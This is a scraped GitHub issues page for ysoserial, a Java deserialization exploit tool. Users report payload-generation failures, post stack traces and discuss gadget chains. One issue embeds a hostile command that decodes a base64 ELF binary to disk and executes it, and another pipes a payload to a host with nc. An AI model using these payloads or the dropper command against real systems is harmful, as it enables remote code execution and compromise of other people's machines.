Giter VIP home page Giter VIP logo

ysoserial's Issues

CommonsBeanutilsCollectionsLogging1 throws InvocationTargetException on deserialization

I'm trying out CommonsBeanutilsCollectionsLogging1 and while it does pass the Unit Test, it doesn't seem to actually lead to RuntimeExec execution during deserialization. Instead a get an exception from BeanComparator:

Haven't had a chance to add more debugging to BeanComparator yet, but did anyone else get this to work?

Exception in thread "main" java.lang.RuntimeException: InvocationTargetException: java.lang.reflect.InvocationTargetException at org.apache.commons.beanutils.BeanComparator.compare(BeanComparator.java:171) at java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:721) at java.util.PriorityQueue.siftDown(PriorityQueue.java:687) at java.util.PriorityQueue.heapify(PriorityQueue.java:736) at java.util.PriorityQueue.readObject(PriorityQueue.java:795) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058) at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1900) at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1801) at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351) at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371) at testSerialization.Deserializer.main(Deserializer.java:14)

how Time-based delay

java :In the case of a firewall, no echo
Time-based
or
Specify java source code file, automatically call javac, or support embedded class, and run the class

指定java源码文件,自动调用javac,或者支持嵌入class,并运行class

Thread.sleep(5000);

or
Thread.sleep(arg);

[Enhancement] TemplatesImpl gadget for IBM Java

Hi,

The TemplateImpl gadget used by most payloads does not work on IBM Java. There is a way (or you have some indications) to have the gadget working on IBM Java products?

Thank you a lot!

Federico

(False Positive) Error while generating "Spring1" payload

Hi , Sorry I am not very familiar with Java but I tried to generate payload using "Spring1" and ysoserial gives me the error shown in the attached file. I have tried the jar file from JitPack as well as the one built successfully on my machine using maven. Could you please help ? I am using this:

commands :

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Spring1 "touch /tmp/serial" > payload.txt

error.txt

java -version

java version "1.8.0_171" Java(TM) SE Runtime Environment (build 1.8.0_171-b11) Java HotSpot(TM) 64-Bit Server VM (build 25.171-b11, mixed mode)

CommonsCollections5.java - wrong gadget chain in comments

It should be something like:

ObjectInputStream.readObject()
	BadAttributeValueExpException .toString()
		TiedMapEntry.toString()
			LazyMap.get()
				ChainedTransformer.transform()
					ConstantTransformer.transform()
					InvokerTransformer.transform()
						Method.invoke()
							Class.getMethod()
					InvokerTransformer.transform()
						Method.invoke()
							Runtime.getRuntime()
					InvokerTransformer.transform()
						Method.invoke()
							Runtime.exec()

Make AnnotationInvocationHandler usage dynamic

Right now, there are five different ways (in various branches and pull requests) to use AIH as part of a payload.

  1. The original way, patched in Java 7 and 8 earlier this year
  2. BadAttributeValueExpException (CC5), requires no SecurityManager present
  3. ACC's ListOrderedMap (my CC6: https://github.com/drosenbauer/ysoserial/blob/cli-improvements/src/main/java/ysoserial/payloads/CommonsCollections6.java)
  4. ConcurrentHashMap (@jasinner's CC6: jasinner@f1e23cc, proposed by @matthiaskaiser in #17)
  5. Another (?) CC6 in #50 by @matthiaskaiser, unless that's the same as his proposal in #17

Once #45 is done to everybody's satisfaction and merged in, these should all be combined back into the four original payloads, using a (defaulted) command line switch to select among them at generation time.

JitPack link 404s

The JitPack link in README.md 404s. The directory seems to be there, and I see logs, but the artifact does not appear to be available. There are a couple warnings in the build log I looked at, but at the end it does list the artifact, so it would seem that it was created.

Link:
https://jitpack.io/com/github/frohoff/ysoserial/master/ysoserial-master.jar

To test:

user@localhost:~$ curl https://jitpack.io/com/github/frohoff/ysoserial/master/ysoserial-master.jar
Build failed. See the log at jitpack.io

Cant create object from CommonsCollections2,CommonsCollections4 payloads on Android 6.0.1

Hi, firstly thanks for the great work on this, and apologies if this is a dupe or has been asked before.

I have found an app that includes the vulnerable Apache Commons Collections (4.0) library and an exported activity that uses getSerializableExtra() to get serialised data from the activity intent. I'd like to generate an object from the payloads (CommonsCollections2 and CommonsCollections4) created by ysoserial and send these in an intent from my 3rd party PoC app in an effort to achieve RCE in the context of the target app.

I have included the Commons Collections 4.0 library in my PoC app but am unable to generate the object to send in the intent, for either payload. It seems I am missing the TemplatesImpl and TrAXFilter gadgets from the classpath.

Is there a working payload for Android 6.0.1 at this time, am I missing something? Or is it better for me to look for a (new/modified) gadget chain myself?

Many thanks, logcat output below.

04-22 20:19:10.925 17261-17261/poc.chutchut.soserialpoc I/System.out: Generating object for payload: CommonsCollections2.bin
04-22 20:19:11.386 17261-17261/poc.chutchut.soserialpoc W/System.err: Exception generating serialised object from payload [CommonsCollections2.bin]: com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
java.lang.ClassNotFoundException: com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
04-22 20:19:11.415 17261-17261/poc.chutchut.soserialpoc W/System.err: at java.lang.Class.classForName(Native Method)
04-22 20:19:11.416 17261-17261/poc.chutchut.soserialpoc W/System.err: at java.lang.Class.forName(Class.java:324)
at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java:2258)
at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1641)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1782)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.util.PriorityQueue.readObject(PriorityQueue.java:307)
at java.lang.reflect.Method.invoke(Native Method)
at java.io.ObjectInputStream.readObjectForClass(ObjectInputStream.java:1330)
at java.io.ObjectInputStream.readHierarchy(ObjectInputStream.java:1242)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1835)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at poc.chutchut.soserialpoc.MainActivity.getObject(MainActivity.java:43)
at poc.chutchut.soserialpoc.MainActivity.access$100(MainActivity.java:13)
at poc.chutchut.soserialpoc.MainActivity$1.onClick(MainActivity.java:30)
at android.view.View.performClick(View.java:5204)
at android.view.View$PerformClick.run(View.java:21153)
at android.os.Handler.handleCallback(Handler.java:739)
at android.os.Handler.dispatchMessage(Handler.java:95)
at android.os.Looper.loop(Looper.java:148)
at android.app.ActivityThread.main(ActivityThread.java:5417)
at java.lang.reflect.Method.invoke(Native Method)
at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)
at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)
Caused by: java.lang.ClassNotFoundException: Didn't find class "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" on path: DexPathList[[zip file "/data/app/poc.chutchut.soserialpoc-2/base.apk"],nativeLibraryDirectories=[/data/app/poc.chutchut.soserialpoc-2/lib/arm, /vendor/lib, /system/lib]]
04-22 20:19:11.417 17261-17261/poc.chutchut.soserialpoc W/System.err: at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
... 29 more
Suppressed: java.lang.ClassNotFoundException: com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
at java.lang.Class.classForName(Native Method)
at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
... 30 more
Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available
04-22 20:19:11.425 17261-17261/poc.chutchut.soserialpoc W/System.err: Object is null!
04-22 20:19:11.425 17261-17261/poc.chutchut.soserialpoc I/System.out: Generating object for payload: CommonsCollections4.bin
04-22 20:19:11.435 17261-17261/poc.chutchut.soserialpoc W/System.err: Exception generating serialised object from payload [CommonsCollections4.bin]: com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter
java.lang.ClassNotFoundException: com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter
04-22 20:19:11.436 17261-17261/poc.chutchut.soserialpoc W/System.err: at java.lang.Class.classForName(Native Method)
at java.lang.Class.forName(Class.java:324)
at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java:2258)
at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1641)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657)
at java.io.ObjectInputStream.readNewClass(ObjectInputStream.java:1512)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:755)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.io.ObjectInputStream.readFieldValues(ObjectInputStream.java:1113)
at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:454)
at java.io.ObjectInputStream.readObjectForClass(ObjectInputStream.java:1345)
at java.io.ObjectInputStream.readHierarchy(ObjectInputStream.java:1242)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1835)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.io.ObjectInputStream.readNewArray(ObjectInputStream.java:1488)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:759)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.io.ObjectInputStream.readFieldValues(ObjectInputStream.java:1113)
at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:454)
at java.io.ObjectInputStream.readObjectForClass(ObjectInputStream.java:1345)
at java.io.ObjectInputStream.readHierarchy(ObjectInputStream.java:1242)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1835)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.io.ObjectInputStream.readFieldValues(ObjectInputStream.java:1113)
at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:454)
04-22 20:19:11.437 17261-17261/poc.chutchut.soserialpoc W/System.err: at java.io.ObjectInputStream.readObjectForClass(ObjectInputStream.java:1345)
at java.io.ObjectInputStream.readHierarchy(ObjectInputStream.java:1242)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1835)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at java.io.ObjectInputStream.readFieldValues(ObjectInputStream.java:1113)
at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:454)
at java.util.PriorityQueue.readObject(PriorityQueue.java:303)
at java.lang.reflect.Method.invoke(Native Method)
at java.io.ObjectInputStream.readObjectForClass(ObjectInputStream.java:1330)
at java.io.ObjectInputStream.readHierarchy(ObjectInputStream.java:1242)
at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1835)
at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
at poc.chutchut.soserialpoc.MainActivity.getObject(MainActivity.java:43)
at poc.chutchut.soserialpoc.MainActivity.access$100(MainActivity.java:13)
at poc.chutchut.soserialpoc.MainActivity$1.onClick(MainActivity.java:30)
at android.view.View.performClick(View.java:5204)
at android.view.View$PerformClick.run(View.java:21153)
at android.os.Handler.handleCallback(Handler.java:739)
at android.os.Handler.dispatchMessage(Handler.java:95)
at android.os.Looper.loop(Looper.java:148)
at android.app.ActivityThread.main(ActivityThread.java:5417)
at java.lang.reflect.Method.invoke(Native Method)
at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)
at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)
Caused by: java.lang.ClassNotFoundException: Didn't find class "com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter" on path: DexPathList[[zip file "/data/app/poc.chutchut.soserialpoc-2/base.apk"],nativeLibraryDirectories=[/data/app/poc.chutchut.soserialpoc-2/lib/arm, /vendor/lib, /system/lib]]
04-22 20:19:11.438 17261-17261/poc.chutchut.soserialpoc W/System.err: at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
... 59 more
Suppressed: java.lang.ClassNotFoundException: com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter
at java.lang.Class.classForName(Native Method)
at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
... 60 more
Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available
04-22 20:19:11.439 17261-17261/poc.chutchut.soserialpoc W/System.err: Object is null!

bug:javassist.CannotCompileException: [source error] ) is missing

java -jar jars/ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 'rm -rf ok.elf;echo "f0VMRgEAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toYUBReGgCAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZt2AhcB4Av/huAEAAAC7AQAAAM2A"|base64 -d>ok.elf;chmod 555 ok.elf;./ok.elf &'  > tmp/payload.bin

Picked up JAVA_TOOL_OPTIONS: -Dfile.encoding=UTF-8
Error while generating or serializing payload
javassist.CannotCompileException: [source error] ) is missing
	at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:119)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:101)
	at ysoserial.payloads.Jdk7u21.getObject(Jdk7u21.java:63)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: compile error: ) is missing
	at javassist.compiler.Parser.parseArgumentList(Parser.java:1340)
	at javassist.compiler.Parser.parseMethodCall(Parser.java:1180)
	at javassist.compiler.Parser.parsePostfix(Parser.java:1036)
	at javassist.compiler.Parser.parseUnaryExpr(Parser.java:888)
	at javassist.compiler.Parser.parseBinaryExpr(Parser.java:775)
	at javassist.compiler.Parser.parseConditionalExpr(Parser.java:719)
	at javassist.compiler.Parser.parseExpression(Parser.java:699)
	at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:591)
	at javassist.compiler.Parser.parseStatement(Parser.java:277)
	at javassist.compiler.Javac.compileStmnt(Javac.java:567)
	at javassist.CtBehavior.insertAfterAdvice(CtBehavior.java:892)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:851)
	... 5 more

CommonsCollections1 Can not running

My environment is

windows 10 pro

java version "1.8.0_131"
Java(TM) SE Runtime Environment (build 1.8.0_131-b11)
Java HotSpot(TM) 64-Bit Server VM (build 25.131-b11, mixed mode)

so when i run the ysoserial commonsCollections1 by IDEA 2017

i see the error code in my monitor

the code is

generating payload object(s) for command: 'calc.exe' serializing payload deserializing payload java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element entrySet at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:81) at com.sun.proxy.$Proxy0.entrySet(Unknown Source) at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:452) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058) at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2136) at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2027) at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1535) at java.io.ObjectInputStream.readObject(ObjectInputStream.java:422) at ysoserial.Deserializer.deserialize(Deserializer.java:27) at ysoserial.Deserializer.deserialize(Deserializer.java:22) at ysoserial.payloads.util.PayloadRunner.run(PayloadRunner.java:39) at ysoserial.payloads.CommonsCollections1.main(CommonsCollections1.java:84)

and the CommonsCollections3 same to CommonsCollections1 as.

Thank you!

JRMPClient payload: how does it work?

Hello:

Can the author of this payload please provide the steps for this exploit to work?

I streamed the payload into a WebLogic instance but I get an exception.
I also tried to create a JRMPListener and use them together but with no success. I guess I do not understand how this payload should work.

Can you please help me?

Thank you!

org.apache.commons.collections4.FunctorException: InstantiateTransformer: Constructor threw an exception

Running:

$ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar CommonsCollections4 calc.exe > ysoserial-cc4-calc-payload.bin

And feeding that to a Java 8, Spring 4.3 app hosted on Tomcat 8.5 with the following code:

			InputStream stream = new FileInputStream("ysoserial-cc4-calc-payload.bin");
			in = new ObjectInputStream(stream);
			in.readObject();
			in.close();

Leads to:

org.springframework.web.util.NestedServletException: Request processing failed; nested exception is org.apache.commons.collections4.FunctorException: InstantiateTransformer: Constructor threw an exception
	org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:982)
	org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:861)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:635)
	org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)


Root Cause
org.apache.commons.collections4.FunctorException: InstantiateTransformer: Constructor threw an exception
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:124)
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:32)
	org.apache.commons.collections4.functors.ChainedTransformer.transform(ChainedTransformer.java:112)
	org.apache.commons.collections4.comparators.TransformingComparator.compare(TransformingComparator.java:81)
	java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:721)
	java.util.PriorityQueue.siftDown(PriorityQueue.java:687)
	java.util.PriorityQueue.heapify(PriorityQueue.java:736)
	java.util.PriorityQueue.readObject(PriorityQueue.java:795)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
	java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)
	java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)
	java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
	java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
	com.veracode.verademo.controller.UserController.test(UserController.java:70)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:205)
	org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:133)
	org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:97)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:827)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:738)
	org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:85)
	org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)
	org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
	org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
	org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:861)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:635)
	org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)


Root Cause
java.lang.reflect.InvocationTargetException
	sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
	sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	java.lang.reflect.Constructor.newInstance(Constructor.java:423)
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:116)
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:32)
	org.apache.commons.collections4.functors.ChainedTransformer.transform(ChainedTransformer.java:112)
	org.apache.commons.collections4.comparators.TransformingComparator.compare(TransformingComparator.java:81)
	java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:721)
	java.util.PriorityQueue.siftDown(PriorityQueue.java:687)
	java.util.PriorityQueue.heapify(PriorityQueue.java:736)
	java.util.PriorityQueue.readObject(PriorityQueue.java:795)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
	java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)
	java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)
	java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
	java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
	com.veracode.verademo.controller.UserController.test(UserController.java:70)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:205)
	org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:133)
	org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:97)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:827)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:738)
	org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:85)
	org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)
	org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
	org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
	org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:861)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:635)
	org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)


Root Cause
java.lang.NullPointerException
	com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet.postInitialization(AbstractTranslet.java:372)
	com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getTransletInstance(TemplatesImpl.java:456)
	com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:486)
	com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter.<init>(TrAXFilter.java:64)
	sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
	sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	java.lang.reflect.Constructor.newInstance(Constructor.java:423)
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:116)
	org.apache.commons.collections4.functors.InstantiateTransformer.transform(InstantiateTransformer.java:32)
	org.apache.commons.collections4.functors.ChainedTransformer.transform(ChainedTransformer.java:112)
	org.apache.commons.collections4.comparators.TransformingComparator.compare(TransformingComparator.java:81)
	java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:721)
	java.util.PriorityQueue.siftDown(PriorityQueue.java:687)
	java.util.PriorityQueue.heapify(PriorityQueue.java:736)
	java.util.PriorityQueue.readObject(PriorityQueue.java:795)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
	java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)
	java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)
	java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
	java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
	com.veracode.verademo.controller.UserController.test(UserController.java:70)
	sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	java.lang.reflect.Method.invoke(Method.java:498)
	org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:205)
	org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:133)
	org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:97)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:827)
	org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:738)
	org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:85)
	org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)
	org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
	org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
	org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:861)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:635)
	org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
	org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)

Automated generation of object-graph and call-tree documentation

To facilitate easier studying of these types of vulnerabilities the tool scaffolding should be able to instrument itself to generate ASCII diagrams of payload object-graphs (similar to this) and deserialization code execution call-trees (similar to this) to understand the mechanics of each gadget chain better. Simply providing a list of gadget classes could be useful, and a more sophisticated implementation could embed and/or link to code/methods executed during deserialization.

Optionally allow such documentation to be printed to the console as verbose-mode help text when using the CLI interface.

PrintUtil from #16 is probably a good start for object graph inspection

Instrumentation stuff:

CLI improvements

CLI arg/param parsing should support the following:

  • reusing payload param definition/processing from within exploits
  • relatively easy addition of gadgets/payloads/exploits and interoperability with existing (compatible) gadgets/payloads/exploits
  • have a reasonable chance of supporting unforeseen exploits/chains/bypasses/etc with minimal changes
  • wider variety of gadgets (non-RCE types)
  • arbitrary parameters for exploits/gadgets (exploit target host/port/path, remote load gadgets, file paths/contents, etc)
  • nesting of payload objects (for wrapping with bypasses, etc) and binding into nested structures
  • annotating payload objects with serialization format and peer/child payload object compatibility
  • automatically generate help text that shows allowable values for fixed-option parameters

Multiple Commands

Is there a reason why this works "ping -c 4 " works, but "ping -c 2 ; ping -c 2 " doesn't work when generating payloads? I can't seem to get anything that isn't a single command to work (no output redirection, not multiple commands, etc.

README error

README states:

nc 10.10.10.10 < groovypayload.bin

